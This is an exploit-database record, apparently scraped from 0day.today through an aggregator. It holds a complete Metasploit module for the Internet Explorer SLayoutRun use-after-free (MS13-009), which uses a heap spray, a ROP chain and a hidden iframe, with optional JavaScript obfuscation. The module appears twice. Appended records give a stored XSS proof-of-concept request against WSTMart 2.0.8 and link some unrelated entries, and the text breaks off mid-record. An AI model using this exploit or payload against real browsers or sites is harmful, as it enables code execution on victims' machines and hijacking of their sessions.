ID 1337DAY-ID-20367
Type zdt
Reporter Scott Bell
Modified 2013-02-14T00:00:00
Description
Exploit for windows platform in category remote exploits
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
'Name' => "Microsoft Internet Explorer SLayoutRun Use-After-Free",
'Description' => %q{
This module exploits a use-after-free vulnerability in Microsoft Internet Explorer
where a CParaElement node is released but a reference is still kept
in CDoc. This memory is reused when a CDoc relayout is performed.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Scott Bell <[email protected]>', # Vulnerability discovery & Metasploit module
],
'References' =>
[
[ 'CVE', '2013-0025' ],
[ 'MSB', 'MS13-009' ],
[ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ],
],
'Payload' =>
{
'BadChars' => "\x00",
'Space' => 1024,
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ]
],
'Privileged' => false,
'DisclosureDate' => "Feb 13 2013",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class)
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
ie_name = "IE #{ie}"
case nt
when '5.1'
os_name = 'Windows XP SP3'
end
targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
print_status("Target selected as: #{t.name}")
return t
end
end
return nil
end
def heap_spray(my_target, p)
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
js = %Q|
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{my_target['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=1; i < 0x300; i++) {
heap_obj.alloc(block);
}
var overflow = nops.substring(0, 10);
|
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
return js
end
def get_payload(t, cli)
code = payload.encoded
# No rop. Just return the payload.
return code if t['Rop'].nil?
# ROP chain generated by mona.py - See corelan.be
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
rop_nops = [0x77c39f92].pack("V") * 11 # RETN
rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
rop_payload << rop_nops
rop_payload << [0x77c364d5].pack("V") # POP EBP # RETN
rop_payload << [0x77c15ed5].pack("V") # XCHG EAX, ESP # RETN
rop_payload << [0x77c35459].pack("V") # PUSH ESP # RETN
rop_payload << [0x77c39f92].pack("V") # RETN
rop_payload << [0x0c0c0c8c].pack("V") # Shellcode offset
rop_payload << code
end
return rop_payload
end
def this_resource
r = get_resource
return ( r == '/') ? '' : r
end
def get_exploit(my_target, cli)
p = get_payload(my_target, cli)
js = heap_spray(my_target, p)
html = %Q|
<!doctype html>
<html>
<head>
<script>
var data
var objArray = new Array(1800);
#{js}
setTimeout(function(){
for (var i=0;i<objArray.length;i++){
objArray[i] = document.createElement('body');
document.body.appendChild(objArray[i])
objArray[i].style.display = "none"
}
document.body.style.whiteSpace = "pre-line"
for(var i=0;i<10;i++){
for (var i=0;i<(objArray.length-650);i++){
objArray[i].className = data += unescape("%u0c0c%u0c0c");
}
}
setTimeout(function(){document.body.innerHTML = "boo"}, 100)
}, 100)
</script>
</head>
<body>
<p> </p>
</body>
</html>
|
return html
end
def get_iframe
html = %Q|
<html>
<body>
<iframe src="#{this_resource}/#{@iframe_name}" height="1" width="1"></iframe>
</body>
</html>
|
return html
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
uri = request.uri
print_status("Requesting: #{uri}")
my_target = get_target(agent)
# Avoid the attack if no suitable target found
if my_target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end
if uri =~ /#{@iframe_name}/
html = get_exploit(my_target, cli)
html = html.gsub(/^\t\t/, '')
print_status("Sending HTML...")
elsif uri=~ /\/$/
html = get_iframe
print_status "Sending IFRAME..."
end
send_response(cli, html, {'Content-Type'=>'text/html'})
end
def exploit
@iframe_name = "#{Rex::Text.rand_text_alpha(5)}.html"
super
end
end
# 0day.today [2018-02-05] #
{"hash": "acb9601c656d1d1e6f39094eb87b7cc66e93932d10b028fab70e357c821a490c", "id": "1337DAY-ID-20367", "lastseen": "2018-02-05T03:11:48", "viewCount": 5, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "12b1be92f9e67fe9377c9eb58f203922", "key": "description"}, {"hash": "34fc6a6910604136306d2865771c0204", "key": "href"}, {"hash": "2c8bd47ca94fbc0dee93098d60d31816", "key": "modified"}, {"hash": "2c8bd47ca94fbc0dee93098d60d31816", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5ef0d2a0e9b4f0770165bd18d2effadd", "key": "reporter"}, {"hash": "7b9d72599f52d06653423f26aa8bc94c", "key": "sourceData"}, {"hash": "f9ed092e9a42337ecd28616de7742afc", "key": "sourceHref"}, {"hash": "937fe1992ca32294a7278515b7b52f43", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2018-02-05T03:11:48", "rev": 2}, "dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:150914"]}, {"type": "zdt", "idList": ["1337DAY-ID-31844"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B37CBBD542C449C43551F611AC7A9A73"]}, {"type": "cve", "idList": ["CVE-2018-20367"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310862842"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:20367"]}], "modified": "2018-02-05T03:11:48", "rev": 2}, "vulnersScore": 6.8}, "type": "zdt", "sourceHref": "https://0day.today/exploit/20367", "description": "Exploit for windows platform in category remote exploits", "title": "Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009)", "history": [{"bulletin": {"hash": "8d74dc2b65fd0002943dd6c4ea281787b85717e4c54079ea66538160b6ff61e3", "id": "1337DAY-ID-20367", "lastseen": "2016-04-20T02:20:30", "enchantments": {"score": {"value": 8.3, "modified": "2016-04-20T02:20:30"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "3c319a1b60d5bef8a23c66f5485e6a45", "key": "href"}, {"hash": "12b1be92f9e67fe9377c9eb58f203922", "key": "description"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "2c8bd47ca94fbc0dee93098d60d31816", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "eaa6ca6456820a65ad5d09bf892bd33a", "key": "sourceHref"}, {"hash": "2c8bd47ca94fbc0dee93098d60d31816", "key": "modified"}, {"hash": "937fe1992ca32294a7278515b7b52f43", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "6508f5c9e904b57ed11ac0d9b08b5cb6", "key": "sourceData"}, {"hash": "5ef0d2a0e9b4f0770165bd18d2effadd", "key": "reporter"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/20367", "description": "Exploit for windows platform in category remote exploits", "viewCount": 0, "title": "Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009)", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = AverageRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n \r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Microsoft Internet Explorer SLayoutRun Use-After-Free\",\r\n 'Description' => %q{\r\n This module exploits a use-after-free vulnerability in Microsoft Internet Explorer\r\n where a CParaElement node is released but a reference is still kept\r\n in CDoc. This memory is reused when a CDoc relayout is performed.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Scott Bell <scott.bell@security-assessment.com>', # Vulnerability discovery & Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0025' ],\r\n [ 'MSB', 'MS13-009' ],\r\n [ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'Space' => 1024,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\",\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Feb 13 2013\",\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n ], self.class)\r\n \r\n end\r\n \r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n \r\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n \r\n ie_name = \"IE #{ie}\"\r\n \r\n case nt\r\n when '5.1'\r\n os_name = 'Windows XP SP3'\r\n end\r\n \r\n targets.each do |t|\r\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n print_status(\"Target selected as: #{t.name}\")\r\n return t\r\n end\r\n end\r\n \r\n return nil\r\n end\r\n \r\n def heap_spray(my_target, p)\r\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\r\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch))\r\n \r\n js = %Q|\r\n \r\n var heap_obj = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_nops}\");\r\n while (nops.length < 0x80000) nops += nops;\r\n var offset = nops.substring(0, #{my_target['Offset']});\r\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x80000-6)/2);\r\n heap_obj.gc();\r\n for (var i=1; i < 0x300; i++) {\r\n heap_obj.alloc(block);\r\n }\r\n var overflow = nops.substring(0, 10);\r\n \r\n |\r\n \r\n js = heaplib(js, {:noobfu => true})\r\n \r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n \r\n end\r\n \r\n return js\r\n end\r\n \r\n def get_payload(t, cli)\r\n code = payload.encoded\r\n \r\n # No rop. Just return the payload.\r\n return code if t['Rop'].nil?\r\n \r\n # ROP chain generated by mona.py - See corelan.be\r\n case t['Rop']\r\n when :msvcrt\r\n print_status(\"Using msvcrt ROP\")\r\n rop_nops = [0x77c39f92].pack(\"V\") * 11 # RETN\r\n rop_payload = generate_rop_payload('msvcrt', \"\", {'target'=>'xp'})\r\n rop_payload << rop_nops\r\n rop_payload << [0x77c364d5].pack(\"V\") # POP EBP # RETN\r\n rop_payload << [0x77c15ed5].pack(\"V\") # XCHG EAX, ESP # RETN\r\n rop_payload << [0x77c35459].pack(\"V\") # PUSH ESP # RETN\r\n rop_payload << [0x77c39f92].pack(\"V\") # RETN\r\n rop_payload << [0x0c0c0c8c].pack(\"V\") # Shellcode offset\r\n rop_payload << code\r\n \r\n end\r\n \r\n return rop_payload\r\n end\r\n \r\n def this_resource\r\n r = get_resource\r\n return ( r == '/') ? '' : r\r\n end\r\n \r\n def get_exploit(my_target, cli)\r\n p = get_payload(my_target, cli)\r\n js = heap_spray(my_target, p)\r\n \r\n \r\n html = %Q|\r\n <!doctype html>\r\n <html>\r\n <head>\r\n <script>\r\n var data\r\n var objArray = new Array(1800);\r\n #{js}\r\n \r\n setTimeout(function(){\r\n for (var i=0;i<objArray.length;i++){\r\n objArray[i] = document.createElement('body');\r\n document.body.appendChild(objArray[i])\r\n objArray[i].style.display = \"none\"\r\n }\r\n \r\n document.body.style.whiteSpace = \"pre-line\"\r\n \r\n for(var i=0;i<10;i++){\r\n for (var i=0;i<(objArray.length-650);i++){\r\n objArray[i].className = data += unescape(\"%u0c0c%u0c0c\");\r\n }\r\n }\r\n \r\n setTimeout(function(){document.body.innerHTML = \"boo\"}, 100)\r\n }, 100)\r\n \r\n </script>\r\n </head>\r\n <body>\r\n <p> </p>\r\n </body>\r\n </html>\r\n |\r\n \r\n return html\r\n end\r\n \r\n \r\n def get_iframe\r\n html = %Q|\r\n <html>\r\n <body>\r\n <iframe src=\"#{this_resource}/#{@iframe_name}\" height=\"1\" width=\"1\"></iframe>\r\n </body>\r\n </html>\r\n |\r\n \r\n return html\r\n end\r\n \r\n \r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n uri = request.uri\r\n print_status(\"Requesting: #{uri}\")\r\n \r\n my_target = get_target(agent)\r\n # Avoid the attack if no suitable target found\r\n if my_target.nil?\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n \r\n \r\n if uri =~ /#{@iframe_name}/\r\n html = get_exploit(my_target, cli)\r\n html = html.gsub(/^\\t\\t/, '')\r\n print_status(\"Sending HTML...\")\r\n elsif uri=~ /\\/$/\r\n html = get_iframe\r\n print_status \"Sending IFRAME...\"\r\n end\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n \r\n \r\n end\r\n \r\n def exploit\r\n @iframe_name = \"#{Rex::Text.rand_text_alpha(5)}.html\"\r\n super\r\n end\r\nend\n\n# 0day.today [2016-04-20] #", "published": "2013-02-14T00:00:00", "references": [], "reporter": "Scott Bell", "modified": "2013-02-14T00:00:00", "href": "http://0day.today/exploit/description/20367"}, "lastseen": "2016-04-20T02:20:30", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = AverageRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n \r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Microsoft Internet Explorer SLayoutRun Use-After-Free\",\r\n 'Description' => %q{\r\n This module exploits a use-after-free vulnerability in Microsoft Internet Explorer\r\n where a CParaElement node is released but a reference is still kept\r\n in CDoc. This memory is reused when a CDoc relayout is performed.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Scott Bell <[email\u00a0protected]>', # Vulnerability discovery & Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0025' ],\r\n [ 'MSB', 'MS13-009' ],\r\n [ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'Space' => 1024,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\",\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Feb 13 2013\",\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n ], self.class)\r\n \r\n end\r\n \r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n \r\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n \r\n ie_name = \"IE #{ie}\"\r\n \r\n case nt\r\n when '5.1'\r\n os_name = 'Windows XP SP3'\r\n end\r\n \r\n targets.each do |t|\r\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n print_status(\"Target selected as: #{t.name}\")\r\n return t\r\n end\r\n end\r\n \r\n return nil\r\n end\r\n \r\n def heap_spray(my_target, p)\r\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\r\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch))\r\n \r\n js = %Q|\r\n \r\n var heap_obj = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_nops}\");\r\n while (nops.length < 0x80000) nops += nops;\r\n var offset = nops.substring(0, #{my_target['Offset']});\r\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x80000-6)/2);\r\n heap_obj.gc();\r\n for (var i=1; i < 0x300; i++) {\r\n heap_obj.alloc(block);\r\n }\r\n var overflow = nops.substring(0, 10);\r\n \r\n |\r\n \r\n js = heaplib(js, {:noobfu => true})\r\n \r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n \r\n end\r\n \r\n return js\r\n end\r\n \r\n def get_payload(t, cli)\r\n code = payload.encoded\r\n \r\n # No rop. Just return the payload.\r\n return code if t['Rop'].nil?\r\n \r\n # ROP chain generated by mona.py - See corelan.be\r\n case t['Rop']\r\n when :msvcrt\r\n print_status(\"Using msvcrt ROP\")\r\n rop_nops = [0x77c39f92].pack(\"V\") * 11 # RETN\r\n rop_payload = generate_rop_payload('msvcrt', \"\", {'target'=>'xp'})\r\n rop_payload << rop_nops\r\n rop_payload << [0x77c364d5].pack(\"V\") # POP EBP # RETN\r\n rop_payload << [0x77c15ed5].pack(\"V\") # XCHG EAX, ESP # RETN\r\n rop_payload << [0x77c35459].pack(\"V\") # PUSH ESP # RETN\r\n rop_payload << [0x77c39f92].pack(\"V\") # RETN\r\n rop_payload << [0x0c0c0c8c].pack(\"V\") # Shellcode offset\r\n rop_payload << code\r\n \r\n end\r\n \r\n return rop_payload\r\n end\r\n \r\n def this_resource\r\n r = get_resource\r\n return ( r == '/') ? '' : r\r\n end\r\n \r\n def get_exploit(my_target, cli)\r\n p = get_payload(my_target, cli)\r\n js = heap_spray(my_target, p)\r\n \r\n \r\n html = %Q|\r\n <!doctype html>\r\n <html>\r\n <head>\r\n <script>\r\n var data\r\n var objArray = new Array(1800);\r\n #{js}\r\n \r\n setTimeout(function(){\r\n for (var i=0;i<objArray.length;i++){\r\n objArray[i] = document.createElement('body');\r\n document.body.appendChild(objArray[i])\r\n objArray[i].style.display = \"none\"\r\n }\r\n \r\n document.body.style.whiteSpace = \"pre-line\"\r\n \r\n for(var i=0;i<10;i++){\r\n for (var i=0;i<(objArray.length-650);i++){\r\n objArray[i].className = data += unescape(\"%u0c0c%u0c0c\");\r\n }\r\n }\r\n \r\n setTimeout(function(){document.body.innerHTML = \"boo\"}, 100)\r\n }, 100)\r\n \r\n </script>\r\n </head>\r\n <body>\r\n <p> </p>\r\n </body>\r\n </html>\r\n |\r\n \r\n return html\r\n end\r\n \r\n \r\n def get_iframe\r\n html = %Q|\r\n <html>\r\n <body>\r\n <iframe src=\"#{this_resource}/#{@iframe_name}\" height=\"1\" width=\"1\"></iframe>\r\n </body>\r\n </html>\r\n |\r\n \r\n return html\r\n end\r\n \r\n \r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n uri = request.uri\r\n print_status(\"Requesting: #{uri}\")\r\n \r\n my_target = get_target(agent)\r\n # Avoid the attack if no suitable target found\r\n if my_target.nil?\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n \r\n \r\n if uri =~ /#{@iframe_name}/\r\n html = get_exploit(my_target, cli)\r\n html = html.gsub(/^\\t\\t/, '')\r\n print_status(\"Sending HTML...\")\r\n elsif uri=~ /\\/$/\r\n html = get_iframe\r\n print_status \"Sending IFRAME...\"\r\n end\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n \r\n \r\n end\r\n \r\n def exploit\r\n @iframe_name = \"#{Rex::Text.rand_text_alpha(5)}.html\"\r\n super\r\n end\r\nend\n\n# 0day.today [2018-02-05] #", "published": "2013-02-14T00:00:00", "references": [], "reporter": "Scott Bell", "modified": "2013-02-14T00:00:00", "href": "https://0day.today/exploit/description/20367"}
{"packetstorm": [{"lastseen": "2018-12-25T18:50:54", "bulletinFamily": "exploit", "description": "", "modified": "2018-12-24T00:00:00", "published": "2018-12-24T00:00:00", "id": "PACKETSTORM:150914", "href": "https://packetstormsecurity.com/files/150914/WSTMart-2.0.8-Cross-Site-Scripting.html", "title": "WSTMart 2.0.8 Cross Site Scripting", "type": "packetstorm", "sourceData": "`# Exploit Title: WSTMart 2.0.8 - Cross-Site Scripting \n# Date: 2018-12-23 \n# Exploit Author: linfeng \n# Vendor Homepage: https://github.com/wstmall/wstmart/ \n# Software Link: http://www.wstmart.net/ \n# Version: WSTMart 2.0.8_181212 \n# CVE: CVE-2018-20367 \n \n# 0x01 stored XSS (PoC) \nFunction point: mall some commodity details - commodity consultation \npoc: \nPOST /st/wstmart_v2.0.8_181212/index.php/home/goodsconsult/add.html HTTP/1.1 \nHost: xx.xx.xx.xx \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0 \nAccept: / \nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 \nAccept-Encoding: gzip, deflate \nReferer: http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/goods-2.html \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \nContent-Length: 83 \nConnection: close \nCookie: PHPSESSID=d1jf7a74dk57sk5jebtg2nckeu; WSTMART_history_goods=think%3A%5B%222%22%2C%2265%22%5D; UM_distinctid=167d5b268981b9-03d665d7d22d54-4c312e7e-100200-167d5b2689945e; CNZZDATA1263804910=767510099-1545475868-%7C1545481454 \n \ngoodsId=2&consultType=1&consultContent=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss%2F)%3E \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150914/wstmart208-xss.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:54", "bulletinFamily": "exploit", "description": "\nWSTMart 2.0.8 - Cross-Site Scripting", "modified": "2018-12-24T00:00:00", "published": "2018-12-24T00:00:00", "id": "EXPLOITPACK:B37CBBD542C449C43551F611AC7A9A73", "href": "", "title": "WSTMart 2.0.8 - Cross-Site Scripting", "type": "exploitpack", "sourceData": "# Exploit Title: WSTMart 2.0.8 - Cross-Site Scripting\n# Date: 2018-12-23\n# Exploit Author: linfeng\n# Vendor Homepage: https://github.com/wstmall/wstmart/\n# Software Link: http://www.wstmart.net/\n# Version: WSTMart 2.0.8_181212 \n# CVE: CVE-2018-20367\n\n# 0x01 stored XSS (PoC)\nFunction point: mall some commodity details - commodity consultation\npoc:\nPOST /st/wstmart_v2.0.8_181212/index.php/home/goodsconsult/add.html HTTP/1.1\nHost: xx.xx.xx.xx\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\nAccept: /\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nReferer: http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/goods-2.html\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 83\nConnection: close\nCookie: PHPSESSID=d1jf7a74dk57sk5jebtg2nckeu; WSTMART_history_goods=think%3A%5B%222%22%2C%2265%22%5D; UM_distinctid=167d5b268981b9-03d665d7d22d54-4c312e7e-100200-167d5b2689945e; CNZZDATA1263804910=767510099-1545475868-%7C1545481454\n\ngoodsId=2&consultType=1&consultContent=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss%2F)%3E", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2018-12-24T22:03:01", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-12-24T00:00:00", "published": "2018-12-24T00:00:00", "id": "1337DAY-ID-31844", "href": "https://0day.today/exploit/description/31844", "title": "WSTMart 2.0.8 - Cross-Site Scripting Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: WSTMart 2.0.8 - Cross-Site Scripting\r\n# Exploit Author: linfeng\r\n# Vendor Homepage: https://github.com/wstmall/wstmart/\r\n# Software Link: http://www.wstmart.net/\r\n# Version: WSTMart 2.0.8_181212 \r\n# CVE: CVE-2018-20367\r\n\r\n# 0x01 stored XSS (PoC)\r\nFunction point: mall some commodity details - commodity consultation\r\npoc:\r\nPOST /st/wstmart_v2.0.8_181212/index.php/home/goodsconsult/add.html HTTP/1.1\r\nHost: xx.xx.xx.xx\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\r\nAccept: /\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/goods-2.html\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 83\r\nConnection: close\r\nCookie: PHPSESSID=d1jf7a74dk57sk5jebtg2nckeu; WSTMART_history_goods=think%3A%5B%222%22%2C%2265%22%5D; UM_distinctid=167d5b268981b9-03d665d7d22d54-4c312e7e-100200-167d5b2689945e; CNZZDATA1263804910=767510099-1545475868-%7C1545481454\r\n\r\ngoodsId=2&consultType=1&consultContent=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss%2F)%3E\n\n# 0day.today [2018-12-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31844"}], "cve": [{"lastseen": "2019-05-29T18:20:03", "bulletinFamily": "NVD", "description": "The \"mall some commodity details: commodity consultation\" component in WSTMart 2.0.8_181212 has stored XSS via the consultContent parameter, as demonstrated by the index.php/home/goodsconsult/add.html URI.", "modified": "2019-01-29T21:01:00", "id": "CVE-2018-20367", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-20367", "published": "2018-12-22T19:29:00", "title": "CVE-2018-20367", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:39:30", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-02-11T00:00:00", "id": "OPENVAS:1361412562310862842", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862842", "title": "Fedora Update for kernel FEDORA-2011-1138", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-1138\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 